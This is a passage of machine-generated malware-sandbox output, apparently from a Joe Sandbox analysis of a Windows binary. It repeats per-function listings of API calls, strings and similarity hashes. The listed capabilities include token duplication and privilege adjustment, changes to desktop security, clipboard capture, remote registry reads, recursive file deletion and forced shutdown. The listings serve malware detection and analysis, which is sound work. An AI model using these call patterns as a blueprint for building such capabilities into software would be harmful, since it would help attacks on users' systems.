• Instruction ID: 415ca200e101ef52a70015c637403f0a7617294703e48fa4659c2e8fa78ad26c
• Opcode Fuzzy Hash: e67a55b698f4d2c64db298dbda2a9bcfb7b9c353197ea086a47cdac3827b4fee
• Instruction Fuzzy Hash: 44E02B35271632A6DF21BE729C11B9B365C9F013B4F150160FC29D60D0DF70CD2086E0
Memory Dump Source
• Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
• Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_260000_Hc.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 602b47e9880098859aa858fc69b92ba6cac40368da69d7032d97fc655e956770
• Instruction ID: e6b50eadc97ba84602d07d659ec7fe4ccecf1b92d6796b927e8a8eb910b6e08f
• Opcode Fuzzy Hash: 602b47e9880098859aa858fc69b92ba6cac40368da69d7032d97fc655e956770
• Instruction Fuzzy Hash: 51F030B1125752CFCB349F64D4A4816B7F5FF14329314893EE1D686510C7719890DF10
                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: __fread_nolock
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2638373210-0
                                                                                                                                                                        • Opcode ID: dbc72fcbbe417d099125a5b7f0b477dbc50683e17be9c436dba593077d17b43b
                                                                                                                                                                        • Instruction ID: 45b6eba6b13d9f1e13613dd6d4c7ee1aca69d2fc847f49a2d3baf01f26994d58
                                                                                                                                                                        • Opcode Fuzzy Hash: dbc72fcbbe417d099125a5b7f0b477dbc50683e17be9c436dba593077d17b43b
                                                                                                                                                                        • Instruction Fuzzy Hash: E9F0587541020DFFDF04DF90C941EAEBBB9FB04308F208045F9149A151C336EA21ABA0
                                                                                                                                                                        APIs
                                                                                                                                                                        • Shell_NotifyIconW.SHELL32(00000002,?), ref: 00263963
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: IconNotifyShell_
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1144537725-0
                                                                                                                                                                        • Opcode ID: bbe38c58a7ec9e8ada79ade73527e8ba0384d88fe934b5174227d7208a2497db
                                                                                                                                                                        • Instruction ID: 0b0c674fd826c50ffd88e19e7fa28c262f1acebd797b8cfb617162d310f7c6cf
                                                                                                                                                                        • Opcode Fuzzy Hash: bbe38c58a7ec9e8ada79ade73527e8ba0384d88fe934b5174227d7208a2497db
                                                                                                                                                                        • Instruction Fuzzy Hash: 47F037749143549FE753DF24EC897967BFCA701718F0000A5A644A7181D7745798CF51
                                                                                                                                                                        APIs
                                                                                                                                                                        • GetLongPathNameW.KERNEL32(?,?,00007FFF), ref: 00263A76
                                                                                                                                                                          • Part of subcall function 00268577: _wcslen.LIBCMT ref: 0026858A
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: LongNamePath_wcslen
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 541455249-0
                                                                                                                                                                        • Opcode ID: f569e2c9825e9b80048c2326cd3892a8b69977d348c31abf1a92d9d774c8eeb9
                                                                                                                                                                        • Instruction ID: 624482ddbdb0bf6d8ac7ea61cf12a62f04800c8e2c8f9427081cc01e33cea6e4
                                                                                                                                                                        • Opcode Fuzzy Hash: f569e2c9825e9b80048c2326cd3892a8b69977d348c31abf1a92d9d774c8eeb9
                                                                                                                                                                        • Instruction Fuzzy Hash: 3EE08C72A002245BCB20A258AC0AFEA77ADDF887A0F4541B1BC09D7258D960AD808A90
                                                                                                                                                                        APIs
                                                                                                                                                                        • CreateFileW.KERNEL32(00000000,00000000,?,002A0A84,?,?,00000000,?,002A0A84,00000000,0000000C), ref: 002A0737
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: CreateFile
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 823142352-0
                                                                                                                                                                        • Opcode ID: 325e11b04b1e23dcbaba2f01ad892b8d41aaa91ee76c128ec9d4eeb8aa02ef1d
                                                                                                                                                                        • Instruction ID: dc59afcf65981b639c1fd3a6df5563122fda15d30ba1b2f47af56ee0b96137cf
                                                                                                                                                                        • Opcode Fuzzy Hash: 325e11b04b1e23dcbaba2f01ad892b8d41aaa91ee76c128ec9d4eeb8aa02ef1d
                                                                                                                                                                        • Instruction Fuzzy Hash: 7ED06C3200010DBBDF028F84ED06EDA3BAAFB48754F014010BE1856020C732E831EB90
                                                                                                                                                                        APIs
                                                                                                                                                                        • GetFileAttributesW.KERNEL32(?,002CD840), ref: 002CEAB1
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: AttributesFile
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3188754299-0
                                                                                                                                                                        • Opcode ID: cc73d10a65e599d7b478ae077a1e8c571e74f37041776a62d2a670b8552ce7f5
                                                                                                                                                                        • Instruction ID: fc5632999ac5efbdc5306b14cc17bdc4656c2391e1d7ea98945608ca62af819f
                                                                                                                                                                        • Opcode Fuzzy Hash: cc73d10a65e599d7b478ae077a1e8c571e74f37041776a62d2a670b8552ce7f5
                                                                                                                                                                        • Instruction Fuzzy Hash: 6DB09224020A0109AD280F386A0DEA9330178427F57DE1BC8E879850E6C33A882FE990
                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 002CDC54: FindFirstFileW.KERNEL32(?,?), ref: 002CDCCB
                                                                                                                                                                          • Part of subcall function 002CDC54: DeleteFileW.KERNEL32(?,?,?,?), ref: 002CDD1B
                                                                                                                                                                          • Part of subcall function 002CDC54: FindNextFileW.KERNELBASE(00000000,00000010), ref: 002CDD2C
                                                                                                                                                                          • Part of subcall function 002CDC54: FindClose.KERNEL32(00000000), ref: 002CDD43
                                                                                                                                                                        • GetLastError.KERNEL32 ref: 002D666E
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: FileFind$CloseDeleteErrorFirstLastNext
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2191629493-0
                                                                                                                                                                        • Opcode ID: 103d644f647a9f7b20795bf785a38719752b3365b1255921dce95981d3fdbb1f
                                                                                                                                                                        • Instruction ID: dbb82004416acbdb672a924c80f4140ba1c7b8f28fed1f20d3119c4dd0d01349
                                                                                                                                                                        • Opcode Fuzzy Hash: 103d644f647a9f7b20795bf785a38719752b3365b1255921dce95981d3fdbb1f
                                                                                                                                                                        • Instruction Fuzzy Hash: 56F08C362202008FCB14EF58D855B6EB7E9AF88360F04845AF9098B352CB74BC51CF90
                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 002C2010: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 002C205A
                                                                                                                                                                          • Part of subcall function 002C2010: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 002C2087
                                                                                                                                                                          • Part of subcall function 002C2010: GetLastError.KERNEL32 ref: 002C2097
                                                                                                                                                                        • LogonUserW.ADVAPI32(?,?,?,00000000,00000000,?), ref: 002C1BD2
                                                                                                                                                                        • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?), ref: 002C1BF4
                                                                                                                                                                        • CloseHandle.KERNEL32(?), ref: 002C1C05
                                                                                                                                                                        • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 002C1C1D
• GetProcessWindowStation.USER32 ref: 002C1C36
• SetProcessWindowStation.USER32(00000000), ref: 002C1C40
• OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 002C1C5C
  • Part of subcall function 002C1A0B: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,002C1B48), ref: 002C1A20
  • Part of subcall function 002C1A0B: CloseHandle.KERNEL32(?,?,002C1B48), ref: 002C1A35
Strings
Memory Dump Source
• Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
• Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_260000_Hc.jbxd
Similarity
• API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLogonLookupPrivilegeUserValue
• String ID: $default$winsta0$j2
• API String ID: 22674027-3831197935
APIs
  • Part of subcall function 002C1A45: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 002C1A60
  • Part of subcall function 002C1A45: GetLastError.KERNEL32(?,00000000,00000000,?,?,002C14E7,?,?,?), ref: 002C1A6C
  • Part of subcall function 002C1A45: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,002C14E7,?,?,?), ref: 002C1A7B
  • Part of subcall function 002C1A45: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,002C14E7,?,?,?), ref: 002C1A82
  • Part of subcall function 002C1A45: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 002C1A99
• GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 002C1518
• GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 002C154C
• GetLengthSid.ADVAPI32(?), ref: 002C1563
• GetAce.ADVAPI32(?,00000000,?), ref: 002C159D
• AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 002C15B9
• GetLengthSid.ADVAPI32(?), ref: 002C15D0
• GetProcessHeap.KERNEL32(00000008,00000008), ref: 002C15D8
• HeapAlloc.KERNEL32(00000000), ref: 002C15DF
• GetLengthSid.ADVAPI32(?,00000008,?), ref: 002C1600
• CopySid.ADVAPI32(00000000), ref: 002C1607
• AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 002C1636
• SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 002C1658
• SetUserObjectSecurity.USER32(?,00000004,?), ref: 002C166A
• GetProcessHeap.KERNEL32(00000000,00000000), ref: 002C1691
• HeapFree.KERNEL32(00000000), ref: 002C1698
• GetProcessHeap.KERNEL32(00000000,00000000), ref: 002C16A1
• HeapFree.KERNEL32(00000000), ref: 002C16A8
• GetProcessHeap.KERNEL32(00000000,00000000), ref: 002C16B1
• HeapFree.KERNEL32(00000000), ref: 002C16B8
• GetProcessHeap.KERNEL32(00000000,?), ref: 002C16C4
• HeapFree.KERNEL32(00000000), ref: 002C16CB
  • Part of subcall function 002C1ADF: GetProcessHeap.KERNEL32(00000008,002C14FD,?,00000000,?,002C14FD,?), ref: 002C1AED
  • Part of subcall function 002C1ADF: HeapAlloc.KERNEL32(00000000,?,00000000,?,002C14FD,?), ref: 002C1AF4
  • Part of subcall function 002C1ADF: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,002C14FD,?), ref: 002C1B03
Similarity
• API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
• String ID:
• API String ID: 4175595110-0
APIs
• OpenClipboard.USER32(002FDCD0), ref: 002DF586
• IsClipboardFormatAvailable.USER32(0000000D), ref: 002DF594
• GetClipboardData.USER32(0000000D), ref: 002DF5A0
• CloseClipboard.USER32 ref: 002DF5AC
• GlobalLock.KERNEL32(00000000), ref: 002DF5E4
• CloseClipboard.USER32 ref: 002DF5EE
• GlobalUnlock.KERNEL32(00000000), ref: 002DF619
• IsClipboardFormatAvailable.USER32(00000001), ref: 002DF626
• GetClipboardData.USER32(00000001), ref: 002DF62E
• GlobalLock.KERNEL32(00000000), ref: 002DF63F
• GlobalUnlock.KERNEL32(00000000), ref: 002DF67F
• IsClipboardFormatAvailable.USER32(0000000F), ref: 002DF695
• GetClipboardData.USER32(0000000F), ref: 002DF6A1
• GlobalLock.KERNEL32(00000000), ref: 002DF6B2
• DragQueryFileW.SHELL32(00000000,000000FF,00000000,00000000), ref: 002DF6D4
• DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 002DF6F1
• DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 002DF72F
• GlobalUnlock.KERNEL32(00000000), ref: 002DF750
• CountClipboardFormats.USER32 ref: 002DF771
• CloseClipboard.USER32 ref: 002DF7B6
Similarity
• API ID: Clipboard$Global$AvailableCloseDataDragFileFormatLockQueryUnlock$CountFormatsOpen
• String ID:
• API String ID: 420908878-0
APIs
• FindFirstFileW.KERNEL32(?,?), ref: 002D7403
• FindClose.KERNEL32(00000000), ref: 002D7457
• FileTimeToLocalFileTime.KERNEL32(?,?), ref: 002D7493
• FileTimeToLocalFileTime.KERNEL32(?,?), ref: 002D74BA
  • Part of subcall function 0026B329: _wcslen.LIBCMT ref: 0026B333
• FileTimeToSystemTime.KERNEL32(?,?), ref: 002D74F7
• FileTimeToSystemTime.KERNEL32(?,?), ref: 002D7524
Strings
Similarity
• API ID: Time$File$FindLocalSystem$CloseFirst_wcslen
• String ID: %02d$%03d$%4d$%4d%02d%02d%02d%02d%02d$%4d%02d%02d%02d%02d%02d%03d
• API String ID: 3830820486-3289030164
APIs
• FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 002DA0A8
• GetFileAttributesW.KERNEL32(?), ref: 002DA0E6
• SetFileAttributesW.KERNEL32(?,?), ref: 002DA100
• FindNextFileW.KERNEL32(00000000,?), ref: 002DA118
• FindClose.KERNEL32(00000000), ref: 002DA123
• FindFirstFileW.KERNEL32(*.*,?), ref: 002DA13F
• SetCurrentDirectoryW.KERNEL32(?), ref: 002DA18F
• SetCurrentDirectoryW.KERNEL32(00327B94), ref: 002DA1AD
• FindNextFileW.KERNEL32(00000000,00000010), ref: 002DA1B7
• FindClose.KERNEL32(00000000), ref: 002DA1C4
• FindClose.KERNEL32(00000000), ref: 002DA1D4
Strings
Memory Dump Source
• Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
• Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_260000_Hc.jbxd
Similarity
• API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
• String ID: *.*
• API String ID: 1409584000-438819550
• Opcode ID: 634439d71141b1df380552c180a9705cc9d313080ee3633910e92e20fdd8cd2c
• Instruction ID: df636892aefcc616847d0f6e0b0f1fe56c61024b7e965a3caceb44589481859c
• Opcode Fuzzy Hash: 634439d71141b1df380552c180a9705cc9d313080ee3633910e92e20fdd8cd2c
• Instruction Fuzzy Hash: 3131D23151121A6ADF10AFB4EC4DEEE73ADAF05360F0000A2E819D2190EB74DE65CF61
APIs
• GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 002D4785
• _wcslen.LIBCMT ref: 002D47B2
• CreateDirectoryW.KERNEL32(?,00000000), ref: 002D47E2
• CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 002D4803
• RemoveDirectoryW.KERNEL32(?), ref: 002D4813
• DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 002D489A
• CloseHandle.KERNEL32(00000000), ref: 002D48A5
• CloseHandle.KERNEL32(00000000), ref: 002D48B0
Strings
Similarity
• API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove_wcslen
• String ID: :$\$\??\%s
• API String ID: 1149970189-3457252023
• Opcode ID: cb601f250dace218283ebca225a5c2b3303526a2471e3dd48b469ce427b197ca
• Instruction ID: 974d1ce6b19bdabadf60ef39b96b4185addeac55bd10824c304d64947a98ed3a
• Opcode Fuzzy Hash: cb601f250dace218283ebca225a5c2b3303526a2471e3dd48b469ce427b197ca
• Instruction Fuzzy Hash: 4A31D47551024AABDB20AFA0DC49FEB37BDEF89750F1040B6F609D21A1E7709A54CF24
APIs
• FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 002DA203
• FindNextFileW.KERNEL32(00000000,?), ref: 002DA25E
• FindClose.KERNEL32(00000000), ref: 002DA269
• FindFirstFileW.KERNEL32(*.*,?), ref: 002DA285
• SetCurrentDirectoryW.KERNEL32(?), ref: 002DA2D5
• SetCurrentDirectoryW.KERNEL32(00327B94), ref: 002DA2F3
• FindNextFileW.KERNEL32(00000000,00000010), ref: 002DA2FD
• FindClose.KERNEL32(00000000), ref: 002DA30A
• FindClose.KERNEL32(00000000), ref: 002DA31A
  • Part of subcall function 002CE399: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 002CE3B4
Strings
Similarity
• API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
• String ID: *.*
• API String ID: 2640511053-438819550
• Opcode ID: 9a6778ecd2641a2b8496a08cb2607c8461afa57880ad99847bed771d194144ac
• Instruction ID: c52ad951e5ca7f6d6d62991577313e686e73cf351c96b6202b6348eaacfa72e1
• Opcode Fuzzy Hash: 9a6778ecd2641a2b8496a08cb2607c8461afa57880ad99847bed771d194144ac
• Instruction Fuzzy Hash: 4C31123151121A6ACF10AFA5EC0DEEE77AEAF45360F1041A2F810A32D0DB71DEA5CF55
APIs
  • Part of subcall function 002ED3F8: CharUpperBuffW.USER32(?,?,?,?,?,?,?,002EC10E,?,?), ref: 002ED415
  • Part of subcall function 002ED3F8: _wcslen.LIBCMT ref: 002ED451
  • Part of subcall function 002ED3F8: _wcslen.LIBCMT ref: 002ED4C8
  • Part of subcall function 002ED3F8: _wcslen.LIBCMT ref: 002ED4FE
• RegConnectRegistryW.ADVAPI32(?,?,?), ref: 002EC99E
• RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?), ref: 002ECA09
• RegCloseKey.ADVAPI32(00000000), ref: 002ECA2D
• RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 002ECA8C
• RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 002ECB47
• RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 002ECBB4
• RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 002ECC49
• RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,00000000,?,?,?,00000000), ref: 002ECC9A
• RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 002ECD43
• RegCloseKey.ADVAPI32(?,?,00000000), ref: 002ECDE2
• RegCloseKey.ADVAPI32(00000000), ref: 002ECDEF
Similarity
• API ID: QueryValue$Close_wcslen$BuffCharConnectOpenRegistryUpper
• String ID:
• API String ID: 3102970594-0
• Opcode ID: 4488f18969d1dbf28e04c0abed3851eebef048672240c67cd7e2233834942960
• Instruction ID: c5d810b057c4baceb5bd2093dcac5b97539dcb6a5f7f382dd63e28d7f82e072c
• Opcode Fuzzy Hash: 4488f18969d1dbf28e04c0abed3851eebef048672240c67cd7e2233834942960
• Instruction Fuzzy Hash: 92028171614241AFC714DF29C895E2ABBE5EF49318F5884ADF849CB2A2CB31EC52CF51
APIs
  • Part of subcall function 00265851: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,002655D1,?,?,002A4B76,?,?,00000100,00000000,00000000,CMDLINE), ref: 00265871
  • Part of subcall function 002CEAB0: GetFileAttributesW.KERNEL32(?,002CD840), ref: 002CEAB1
• FindFirstFileW.KERNEL32(?,?), ref: 002CD9CD
• DeleteFileW.KERNEL32(?,?,?,?,?,00000000,?,?,?), ref: 002CDA88
• MoveFileW.KERNEL32(?,?), ref: 002CDA9B
• DeleteFileW.KERNEL32(?,?,?,?), ref: 002CDAB8
• FindNextFileW.KERNEL32(00000000,00000010), ref: 002CDAE2
  • Part of subcall function 002CDB47: CopyFileExW.KERNEL32(?,?,00000000,00000000,00000000,00000008,?,?,002CDAC7,?,?), ref: 002CDB5D
• FindClose.KERNEL32(00000000,?,?,?), ref: 002CDAFE
• FindClose.KERNEL32(00000000), ref: 002CDB0F
Strings
Similarity
• API ID: File$Find$CloseDelete$AttributesCopyFirstFullMoveNameNextPath
• String ID: \*.*
• API String ID: 1946585618-1173974218
• Opcode ID: 02936d027e805fd9f3fef28ce1bee6f653e277f8826e94b89bbc48ea8aa93e6b
• Instruction ID: 2e1dc6dcbb2673a886ef54830962e2d9570df10119e7a3353ee51fc97f822e1e
• Opcode Fuzzy Hash: 02936d027e805fd9f3fef28ce1bee6f653e277f8826e94b89bbc48ea8aa93e6b
• Instruction Fuzzy Hash: 6C615E3181110DAECF05EFA0D996EEDB7B5AF14304F6041A9E402B7196DB316F99CFA0
APIs
Memory Dump Source
• Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
• Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_260000_Hc.jbxd
Similarity
• API ID: Clipboard$AllocCloseEmptyGlobalOpen
• String ID:
• API String ID: 1737998785-0
APIs
  • Part of subcall function 002C2010: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 002C205A
  • Part of subcall function 002C2010: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 002C2087
  • Part of subcall function 002C2010: GetLastError.KERNEL32 ref: 002C2097
• ExitWindowsEx.USER32(?,00000000), ref: 002CF249
Strings
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_260000_Hc.jbxd
Similarity
• API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
• String ID: $ $@$SeShutdownPrivilege
• API String ID: 2234035333-3163812486
APIs
• DefDlgProcW.USER32(?,?), ref: 0026233E
• GetSysColor.USER32(0000000F), ref: 00262421
• SetBkColor.GDI32(?,00000000), ref: 00262434
Strings
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_260000_Hc.jbxd
Similarity
• API ID: Color$Proc
• String ID: (3
• API String ID: 929743424-113007392
APIs
• CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,002A56C2,?,?,00000000,00000000), ref: 002D3A1E
• FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,002A56C2,?,?,00000000,00000000), ref: 002D3A35
• LoadResource.KERNEL32(?,00000000,?,?,002A56C2,?,?,00000000,00000000,?,?,?,?,?,?,002666CE), ref: 002D3A45
• SizeofResource.KERNEL32(?,00000000,?,?,002A56C2,?,?,00000000,00000000,?,?,?,?,?,?,002666CE), ref: 002D3A56
